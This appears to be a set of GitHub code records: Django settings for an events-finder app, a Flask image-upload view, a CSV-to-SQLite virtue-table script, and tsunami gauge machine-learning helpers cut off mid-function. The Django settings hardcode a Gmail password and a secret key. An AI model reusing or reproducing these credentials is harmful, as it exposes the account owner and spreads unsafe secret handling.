+{"seq_id":"11063613556","text":"from djangoappengine.settings_base import *\nimport os\n\nDATABASES['native'] = DATABASES['default']\nDATABASES['default'] = {'ENGINE': 'dbindexer', 'TARGET': 'native'}\nAUTOLOAD_SITECONF = 'indexes'\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Alejandro Saucedo', 'hackasoton@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\n#Use email\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 25\nEMAIL_HOST_USER = 'hackasoton@gmail.com'\nEMAIL_HOST_PASSWORD = 'HackaS0t0n'\n\nDEFAULT_FROM_EMAIL = 'hackasoton@gmail.com'\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\nALLOWED_HOSTS = [ '.events-finder.appspot.com']\n\nTIME_ZONE = 'Europe/London'\nLANGUAGE_CODE = 'en-gb'\n\nSITE_ID = 1\n\n# Use optimizations\nUSE_I18N = True\n\n# Django should format dates\nUSE_L10N = True\n\n# Application is not timezone aware\nUSE_TZ = False\n\nAPPEND_SLASH = True\n\n# Media 
files\nMEDIA_ROOT = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'media'))\nMEDIA_URL = '/media/'\nMAX_UPLOAD_SIZE = 20971520\nCONTENT_TYPES = ['image/jpeg', 'image/png']\n\n# Static Files\nSTATIC_ROOT = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'static'))\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'djangotoolbox',\n 'autoload',\n 'dbindexer',\n\n #'httplib2',# These 4 are\n #'openid',# what u need to\n #'oauth2',# integrate social_auth plug\n 'social_auth',# in your GAE project\n\n # djangoappengine should come last, so it can override a few manage.py commands\n 'djangoappengine',\n\n 'eventsfinder'\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'nqc8l#-7^n-$v^ls=v%t#1pq&j(i__heue^xvjhdt=om5!98#!'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.core.context_processors.media',\n \"eventsfinder.ef_context.in_prod\",\n \"social_auth.context_processors.social_auth_by_type_backends\"\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'eventsfinder.urls'\n\nTEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'\n\nTEMPLATE_DIRS = (\n os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'templates'))\n)\n\n\n#\nAUTHENTICATION_BACKENDS = (\n # 'social_auth.backends.twitter.TwitterBackend',\n # 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nSOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'\nSOCIAL_AUTH_UID_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_HANDLE_LENGTH = 16\nSOCIAL_AUTH_NONCE_SERVER_URL_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_SERVER_URL_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_HANDLE_LENGTH = 16\n\nSOCIAL_AUTH_ENABLED_BACKENDS = ('twitter', 'facebook')\n\n\nTWITTER_CONSUMER_KEY = ''\nTWITTER_CONSUMER_SECRET = ''\nFACEBOOK_APP_ID = ''\nFACEBOOK_API_SECRET = ''\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/members/'\nLOGIN_ERROR_URL = '/login-error/'\n\n","repo_name":"martimarkov/eventsfinder","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37995699831","text":"import helpers\nfrom app import app\nfrom models.user import User\nfrom 
models.image import Image\nfrom werkzeug.utils import secure_filename\nfrom flask_login import current_user, login_required\nfrom flask import Blueprint, render_template, request, redirect, flash, url_for\n\nimages_blueprint = Blueprint('images', __name__, template_folder='templates')\n\n@images_blueprint.route('/', methods=['POST'])\n@login_required\ndef create():\n user = User.get_by_id(current_user.id)\n if current_user == user:\n file = request.files[\"photo-post\"]\n\n if file and allowed_file(file.filename):\n file.filename = secure_filename(file.filename)\n helpers.upload_images_to_s3(file, app.config[\"S3_BUCKET\"], user.id)\n i = Image(image_path=file.filename,\n caption=request.form.get('caption'), user=user)\n if i.save():\n flash(f\"Image successfully uploaded.\")\n return redirect(url_for('users.show', username=user.username))\n else:\n return render_template('users/show.html', errors=user.errors)\n else:\n return render_template('users/show.html', errors={'Access': 'You do not have access to this page.'})\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in set(\n ['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n","repo_name":"kharissa/instagood","sub_path":"instagram_web/blueprints/images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34494689082","text":"import pandas as pd\nimport numpy as np\nimport sqlite3\nimport virtueHolder as vt\n\n#\n# General Algorithm Mark 1:\n# 1) Split column names based on the underscores\n# 2) Then, classify whether it's preconditions, postconditions,\n# 2.1) ids are added by default, as STORY_ACTION_ID\n# 2.2) If it's accept or reject, then classify further on that\n# 2.3) If neither, go to the basic information set\n# 3) Choose table based on VIRTUE and The name after it\n# 4) Choose column based on the SUBVIRTUE/SUBVIRTUE and name concatenated\n# 5) SECOND_PERSON and THIRD_PERSON define those as True under separate headings\n# 6) Same with ABOVE and BELOW\n\n\n'''\n The above algorithm fails, here is mark 2:\n 1. Create 8 virtueHolder Objects\n 2. 
Generate them with the STORY_ACTION_ID column\n\n'''\n\n\n# What may be wise is to generate each of the columns as a dictionary, and then generate dataframes and then export\ndef sortColumn(dictionary, data, columnName):\n splitName = columnName.split(\"_\")\n searchStrings = [\"SUBVIRTUE\", \"SUBVICE\"]\n newColumnName = \"\"\n for search in searchStrings:\n print(splitName)\n if search in splitName:\n newColumnName = search\n try:\n if(splitName[splitName.index(search) + 1] not in \"SECOND\" and splitName[splitName.index(search) + 1] not in \"THIRD\" and splitName[splitName.index(search) + 1] not in \"ABOVE\" and splitName[splitName.index(search) + 1] not in \"BELOW\"):\n newColumnName = search + \"_\" + (splitName[splitName.index(search) + 1])\n except IndexError:\n print(\"Simply the subvirtue or subvice\")\n print(\"New Column Name: \" + newColumnName)\n dictionary.update({newColumnName : data[columnName]})\n\n\n\n\n\n\nisPrecondition = False\nisPostconditionaccept = False\nisPostconditionreject = False\nisAbove = False\nisBelow = False\nisSecondPerson = False\nisThirdPerson = False\nTABLE_NAME_VIRTUE = \"\"\nCOLUMN_NAME_SUBVIRTUE = \"\"\n\nCSVData = pd.read_csv('story_actions.csv')\n\nVIRTUE_FAITH = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_HOPE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_CHARITY = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_FORTITUDE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_PRUDENCE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_JUSTICE = pd.DataFrame()\nVIRTUE_TEMPERANCE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nPASSIONS = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nBASICDATA = pd.DataFrame({\"ID\" : CSVData[\"id\"],\"TYPE\" : CSVData[\"TYPE\"], \"QUOTES_SCRIPTURE\": CSVData[\"QUOTES_SCRIPTURE\"]})\nSCRIPTUREBANK = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"], \"VersesList\": CSVData[\"SCRIPTURE_BANKVERSES\"]})\ncurrentTable = {}\n\n#test = vt.VirtueHolder(CSVData[\"id\"])\n\nfor col in CSVData:\n print(col)\n isPrecondition = False\n isPostconditionaccept = False\n isPostconditionreject = False\n isAbove = False\n isBelow = False\n isSecondPerson = False\n isThirdPerson = False\n if \"PRECONDITIONS\" in col:\n isPrecondition = True\n elif \"POSTCONDITIONS\" in col:\n if \"ACCEPT\" in col:\n isPostconditionaccept = True\n else:\n isPostconditionreject = True\n if \"ABOVE\" in col:\n isAbove = True\n if \"BELOW\" in col:\n isBelow = True\n if \"SECOND_PERSON\" in col:\n isSecondPerson = True\n if \"THIRD_PERSON\" in col:\n isThirdPerson = True\n VIRTUE_JUSTICE = VIRTUE_JUSTICE.append({\"IS_PRECONDITION\": isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject,\n \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\":\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson,\n \"THIRD_PERSON\": isThirdPerson}, ignore_index= True)\nprint(VIRTUE_JUSTICE)\nVIRTUE_JUSTICE.to_csv(\"JusticeTest.csv\")\nquit()\nVIRTUE_JUSTICE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nfor col in CSVData:\n isPrecondition = False\n isPostconditionaccept = False\n isPostconditionreject = False\n isAbove = False\n isBelow = False\n isSecondPerson = False\n isThirdPerson = False\n if \"PRECONDITIONS\" in col:\n isPrecondition = True\n elif \"POSTCONDITIONS\" in col:\n if \"ACCEPT\" in col:\n isPostconditionaccept = True\n else:\n isPostconditionreject = True\n if \"ABOVE\" in col:\n isAbove = True\n if \"BELOW\" in col:\n 
isBelow = True\n if \"SECOND_PERSON\" in col:\n isSecondPerson = True\n if \"THIRD_PERSON\" in col:\n isThirdPerson = True\n if \"VIRTUE_JUSTICE\" in col:\n VIRTUE_JUSTICE.append({\"IS_PRECONDITION\": isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject,\n \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\":\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson,\n \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_JUSTICE, CSVData, col)\n\n elif \"VIRTUE_TEMPERANCE\" in col:\n VIRTUE_TEMPERANCE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_TEMPERANCE, CSVData, col)\n elif \"VIRTUE_PRUDENCE\" in col:\n VIRTUE_PRUDENCE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_PRUDENCE, CSVData, col)\n elif \"VIRTUE_FORTITUDE\" in col:\n VIRTUE_FORTITUDE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_FORTITUDE, CSVData, col)\n elif \"VIRTUE_CHARITY\" in col:\n VIRTUE_CHARITY.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_CHARITY, CSVData, col)\n elif \"VIRTUE_HOPE\" in col:\n VIRTUE_HOPE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_HOPE, CSVData, col)\n elif \"VIRTUE_FAITH\" in col:\n VIRTUE_FAITH.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_FAITH, CSVData, col)\n\nprint(\"PRUDENCE DICTIONARY\")\nprint(VIRTUE_PRUDENCE)\n\ncon = sqlite3.connect('ThomisticNarrativeDB.db')\nc = con.cursor()\n\ntoExport = pd.DataFrame.from_dict(VIRTUE_PRUDENCE)\ntoExport.to_sql('VIRTUE_PRUDENCE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_FAITH)\ntoExport.to_sql('VIRTUE_FAITH', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_HOPE)\ntoExport.to_sql('VIRTUE_HOPE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_CHARITY)\ntoExport.to_sql('VIRTUE_CHARITY', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_TEMPERANCE)\ntoExport.to_sql('VIRTUE_TEMPERANCE', con, if_exists='replace', index = False)\ntoExport = 
pd.DataFrame.from_dict(VIRTUE_FORTITUDE)\ntoExport.to_sql('VIRTUE_FORTITUDE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_JUSTICE)\ntoExport.to_sql('VIRTUE_JUSTICE', con, if_exists='replace', index = False)\n\n","repo_name":"TercioOfParma/Thomistic-Narrative-Generator","sub_path":"CSV to Tables Plural.py","file_name":"CSV to Tables Plural.py","file_ext":"py","file_size_in_byte":8659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10252696979","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 7 08:54:57 2021\n\nTo-Do:\n data exploration and plotting functions\n\n@author: Chris\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport os\nfrom pylab import *\nfrom matplotlib.lines import Line2D\n\nfrom sklearn.preprocessing import StandardScaler\n# from sklearn.svm import SVR, SVC, LinearSVC\nfrom sklearn.base import clone\n#from sklearn.linear_model import Ridge, Lasso, ElasticNet\nfrom sklearn.metrics import explained_variance_score, accuracy_score\n\n#from tsfresh import extract_features, select_features\n#from tsfresh.feature_selection import relevance\n#from tsfresh.utilities.dataframe_functions import impute\n#from tsfresh.feature_extraction import ComprehensiveFCParameters, settings\n\n\"\"\"\nLoading data, data exploration\n\"\"\" \n \ndef load_data(outdir, rnums, gaugenos):\n \"\"\"\n Loads data from specified runs and gauge numbers\n Input:\n outdir - outer directory containing runs and corresponding gauge data\n rnums - Run numbers to be loaded\n gaugenos - Gauge numbers to be loaded\n \n Output:\n eta: Dictionary of eta data with the form: eta[(run_number, gauge_number)]\n t: Dictionary of time intervals of the form: t[(run_number, gauge_number)]\n \"\"\"\n eta = {}\n t = {}\n for rnum in rnums:\n rundir = os.path.join(outdir, 'run_%s' % str(rnum).zfill(6))\n for gaugeno in gaugenos:\n gfile = '%s/gauge%s.txt' % (rundir, str(gaugeno).zfill(5))\n g_data = np.genfromtxt(gfile, delimiter=',')\n\n # data in this case has a NaN value for eta @ t=0\n t[(rnum,gaugeno)] = g_data[1:,0] # seconds\n eta[(rnum,gaugeno)] = g_data[1:,1] # surface elevation in meters\n \n return eta, t\n\n\"\"\"\nPre-processing, label creation\n\"\"\"\n\ndef max_eta(data,gaugeno,runs):\n \"\"\"\n Finds the max eta for a specific gauge and run(s)\n Input:\n data - Dictionary of timeseries data with the form: data[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - List or range of run numbers to find the max value for\n \n Output:\n eta_max - np array containing the maximum values.\n \"\"\"\n eta_max = []\n for rnum in runs:\n eta_max.append(np.amax(data[(rnum,gaugeno)]))\n return np.array(eta_max)\n\ndef get_thresh(data,threshold):\n \"\"\"\n Finds index of time series when threshold is met or exceeded\n Input:\n data - Numpy array of time series\n threshold - int/double that each entry in the time series is compared against \n \n Returns:\n i - Integer index of time series when threshold is met or exceeded\n OR\n math.nan - Returns NaN if threshold is not met/exceeded\n \"\"\"\n for i in range(len(data)):\n if np.abs(data[i]) >= threshold:\n return i\n return math.nan\n\n#Document later. 
Creates matrix with raw time series\ndef stack_series_raw(data, time, gaugeno, rnums, gnum_thresh, g_thresh, threshold, tsteps, subs_thresh, subs_time):\n runs_used = []\n g = []\n times = []\n tstart = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n w_ind = get_thresh(g_data,threshold) #returns NaN if threshold is not met/exceeded for input window\n g_ind = get_thresh(data[(rnum,gnum_thresh)],g_thresh) #returns NaN if threshold is not met/exceeded for target gauge\n \n if not math.isnan(w_ind) and not math.isnan(g_ind) and np.average(g_data[0:subs_time]) > subs_thresh:\n #checking to see if there is enough data after threshold is met/exceeded\n if w_ind+tsteps < len(g_data):\n runs_used.append(rnum)\n tstart.append(w_ind)\n g.append(g_data[w_ind:w_ind+tsteps])\n times.append(t_data[w_ind:w_ind+tsteps])\n# else:\n# g.extend(g_data[w_ind:].tolist())\n# times.extend(t_data[w_ind:].tolist())\n return np.asarray(g), runs_used, np.asarray(times), tstart\n\ndef stack_series(data, time, gaugeno, rnums, gnum_thresh, g_thresh, threshold, tsteps, subs_thresh, subs_time):\n \n \"\"\"\n Stacks the time series used to construct the dataframe for feature extraction with thresholding.\n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Integer total number of runs\n gnum_thresh - Integer gauge number of target gauge used in prediction we are also thresholding\n g_thresh - Threshold eta of target gauge\n threshold - int/double that each entry in the time series is compared against for gaugeno\n tsteps - Number of time steps to extract after threshold is met\n subs_thresh - Threshold for average initial subsidence\n subs_time - Time steps over which the average subsidence is taken\n \n Returns:\n g - Stacked eta time series of the form [(Run#0000,Gauge#702),(Run#0001,Gauge#702), ..., (Run#1299,Gauge#702)]\n run_id - ID used to identify which run number the time series belongs to, ranges from 0 to 1299\n runs_used - List containing the run numbers used (met the threshold). Not used for feature extraction\n times - The time scale/interval corresponding to an eta time series\n tstart - The indices where each time series met or exceeded the threshold. 
Not used for feature extraction\n \"\"\"\n runs_used = []\n g = []\n times = []\n run_id = []\n tstart = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n w_ind = get_thresh(g_data,threshold) #returns NaN if threshold is not met/exceeded for input window\n g_ind = get_thresh(data[(rnum,gnum_thresh)],g_thresh) #returns NaN if threshold is not met/exceeded for target gauge\n \n if not math.isnan(w_ind) and not math.isnan(g_ind) and np.average(g_data[0:subs_time]) > subs_thresh: \n runs_used.append(rnum)\n tstart.append(w_ind)\n \n #checking to see if there is enough data after threshold is met/exceeded\n if w_ind+tsteps < len(g_data):\n g.extend(g_data[w_ind:w_ind+tsteps].tolist())\n times.extend(t_data[w_ind:w_ind+tsteps].tolist())\n run_id.extend((np.ones(tsteps)*rnum).tolist())\n else:\n g.extend(g_data[w_ind:].tolist())\n times.extend(t_data[w_ind:].tolist())\n run_id.extend((np.ones(len(g_data)-w_ind)*rnum).tolist())\n\n return g, run_id, runs_used, times, tstart\n\ndef stack_series_all(data, time, gaugeno, runs):\n \"\"\"\n Stacks the time series used to construct the dataframe for feature extraction without thresholding.\n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Integer total number of runs\n \n Returns:\n g - Stacked eta time series of the form [(Run#0000,Gauge#702),(Run#0001,Gauge#702), ..., (Run#1299,Gauge#702)]\n run_id - ID used to identify which run number the time series belongs to, ranges from 0 to 1299\n times - The time scale/interval corresponding to an eta time series\n \"\"\"\n \n rnums = range(0,runs)\n \n g = []\n times = []\n run_id = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n \n g.extend(g_data.tolist())\n times.extend(t_data.tolist())\n run_id.extend((np.ones(len(g_data))*rnum).tolist())\n\n return g, run_id, times\n\ndef max_eta_all(data,gaugeno,runs):\n \"\"\"\n Finds the max eta for all runs and a specific gauge \n Input:\n data - Dictionary of timeseries data with the form: data[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Number of runs\n \n Output:\n eta_max - np array containing the maximum values.\n \"\"\"\n eta_max = []\n for rnum in range(runs):\n eta_max.append(np.amax(data[(rnum,gaugeno)]))\n return np.array(eta_max)\n\ndef classify_labels(maxeta,cat):\n \"\"\"\n Creates labels for classifcation from the max eta values by binning each\n realization\n Input:\n maxeta: np array containig max eta values\n cat: bin edges\n Output:\n Classification labels\n \"\"\"\n labels = []\n for gmax in maxeta:\n if gmax < cat[0]:\n labels.append('A')\n elif gmax < cat[1]:\n labels.append('B')\n elif gmax < cat[2]:\n labels.append('C')\n else:\n labels.append('D')\n return np.array(labels)\n\n# using donsubs indices, do documentation\ndef train_test_split(data, target, train_runs, test_runs):\n train = data[train_runs,:]\n train_target = target[train_runs]\n test = data[test_runs,:]\n test_target = target[test_runs]\n return train, test, train_target, test_target\n\n\"\"\"\nBuild/Train/Test Model\n\"\"\"\n\n#redo documentation\n# changed to numpy arrays\ndef train_test(data, target, runs_used, train_ind, test_ind, scale, c_or_r, model, *returns):\n \"\"\"\n Trains and tests the model using non-linear SVR/SVC. 
\n \n Input:\n feat - List of feature dataframes\n target - Array of target values for regression\n scale - Boolean value to denote whether features should be scaled or not to unit variance and 0 mean.\n c_or_r - Value for specifying classification or regression\n *returns - Boolean value to determine whether scalers and models need to be returned.\n \n Output:\n pred - List of arrays of predictions from testing the model after it is trained\n target - List of arrays of targets that correspond to runs in the test set\n evs - List of explained variance scores for each dataset.\n scalers - List of standard scalers used (Optional)\n models - List of models used (Optional)\n \"\"\"\n data_tmp = data\n pred = []\n tr_pred = []\n targets = []\n acc = []\n \n if returns:\n scalers = [] # empty is scale = false\n models = []\n\n for i in range(len(data)):\n \n # Check file format\n if isinstance(data_tmp[i],pd.DataFrame):\n train_set, test_set, train_target, test_target, = \\\n train_test_split(data_tmp[i].to_numpy(), target, train_ind, test_ind)\n else:\n train_set, test_set, train_target, test_target, = \\\n train_test_split(data_tmp[i], target, train_ind, test_ind) \n \n if scale:\n scaler = StandardScaler()\n train_set = scaler.fit_transform(train_set)\n test_set = scaler.transform(test_set)\n \n model_tmp = clone(model)\n \n model_tmp.fit(train_set, train_target, sample_weight=None)\n \n pred.append(model_tmp.predict(test_set))\n tr_pred.append(model_tmp.predict(train_set))\n \n if c_or_r == 'r':\n acc.append(explained_variance_score(test_target,pred[i]))\n else:\n acc.append(accuracy_score(test_target,pred[i]))\n \n targets.append(test_target)\n \n if returns:\n models.append(model_tmp)\n if scale:\n scalers.append(scaler)\n \n if returns:\n return pred, tr_pred, targets, acc, scalers, models\n else:\n return pred, tr_pred, targets, acc\n\n\"\"\"\nExploring/Plotting Model Results\n\"\"\"\ndef find_inacc_runs(pred, target, runs, n):\n \n \"\"\"\n Finds runs of the n largest absolute difference between predicted and actual and outputs a pandas dataframe. \n\n Input:\n pred - Prediction from regression model\n target - Actual max eta value\n runs - run numbers used for the testing set\n n - number of largest absolute differences returned\n \n Output:\n pd.Dataframe - pandas datafram containing the run numbers, predicted and actual eta, and absolute difference\n of predicted and actual.\n \"\"\"\n \n difference = np.abs(pred-target)\n ind = difference.argsort()[-n:][::-1]\n \n run_dict = {'Run Number' : np.array(runs)[ind], 'Predicted' : pred[ind], 'Actual' : target[ind], \n 'Abs Diff': difference[ind]}\n \n return pd.DataFrame(data = run_dict)\n\ndef find_run(pred, target, runs, run_num):\n \"\"\"\n Prints predicted and actual max eta for a specified run. 
\n\n Input:\n pred - Prediction from regression model\n target - Actual max eta value\n runs - run numbers used for the testing set\n run_num - specified run number\n\n \"\"\"\n\n ind = np.where(runs == run_num)\n \n if len(ind[0]) == 1:\n print(\"Run Number:\" + str(run_num) + \", Predicted:\" + str(pred[ind]) + \", Actual:\" + str(target[ind]))\n else:\n print(\"Run not found.\")\n\ndef plot_test_all(target,pred,line,zoomlim, labels):\n \"\"\"\n Plots the predicted versus actual value for both datasets along with a reference line of slope 1.\n \n Input\n target - Target values\n pred - Predicted values\n line - Endpoint of reference line\n zoomlim - x and y limit for the zoomed in subplot\n labels - labels for the legend\n \"\"\"\n #legend\n \n fig = figure(figsize=(13,7))\n \n ax = fig.add_subplot(1,2,1)\n \n plot(target[0],pred[0],color='tab:orange',marker='.',linestyle='None') \n plot(target[1],pred[1],color='tab:blue',marker='.',linestyle='None')\n \n plot([0,line],[0,line],'k--')\n \n ax.legend(labels)\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n xlim(0,line)\n ylim(0,line)\n ax.set_aspect('equal', adjustable='box')\n \n grid(True)\n \n ax2 = fig.add_subplot(1,2,2)\n \n plot(target[0],pred[0],color='tab:orange',marker='.',linestyle='None') \n plot(target[1],pred[1],color='tab:blue',marker='.',linestyle='None')\n \n plot([0,zoomlim],[0,zoomlim],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n xlim(0,zoomlim)\n ylim(0,zoomlim)\n ax2.set_aspect('equal', adjustable='box')\n \n grid(True)\n\ndef plot_test(target,pred,line,zoomlim,setnum):\n \"\"\"\n Plots the predicted versus actual value for a single dataset along with a reference line of slope 1.\n \n Input\n target - Target values\n pred - Predicted values\n line - Endpoint of reference line\n zoomlim - x and y limit for the zoomed in subplot\n \"\"\"\n \n fig = figure(figsize=(13,7))\n \n ax = fig.add_subplot(1,2,1)\n \n plt.plot(target[setnum],pred[setnum],'.r') \n \n plot([0,line],[0,line],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n plt.xlim(0,line)\n plt.ylim(0,line)\n ax.set_aspect('equal', adjustable='box')\n \n grid(True)\n \n ax2 = fig.add_subplot(1,2,2)\n \n plt.plot(target[setnum],pred[setnum],'.r')\n \n plot([0,zoomlim],[0,zoomlim],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n plt.xlim(0,zoomlim)\n plt.ylim(0,zoomlim)\n ax2.set_aspect('equal', adjustable='box')\n \n grid(True)\n \ndef plot_run(data, time, starttime, runs, rnum, gaugeno, inputg, winnum, winsize, grid, *pred):\n \n \"\"\"\n Plots gauge 702 and a specified 9XX gauge for a specified run number (Temporarily commented out the horizontal lines)\n \n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n starttime - The indices where each time series met or exceeded the threshold.\n runs - List containing the run numbers used (met the threshold).\n rnum - Run number of interest\n gaugeno - Gauge number of interest\n inputg - Input gauge number\n winnum - Integer index of data set of interest\n winsize - Number of time steps to extract after threshold is met for the given dataset\n *pred - optional argument for printing predicted value on title of plot\n \"\"\"\n \n fig, (ax1, ax2) = plt.subplots(2,sharex=True, sharey=False,figsize=(12,10))\n \n title = 'Run # %s' % rnum\n \n if pred:\n title =title + ', Predicted: %sm' % 
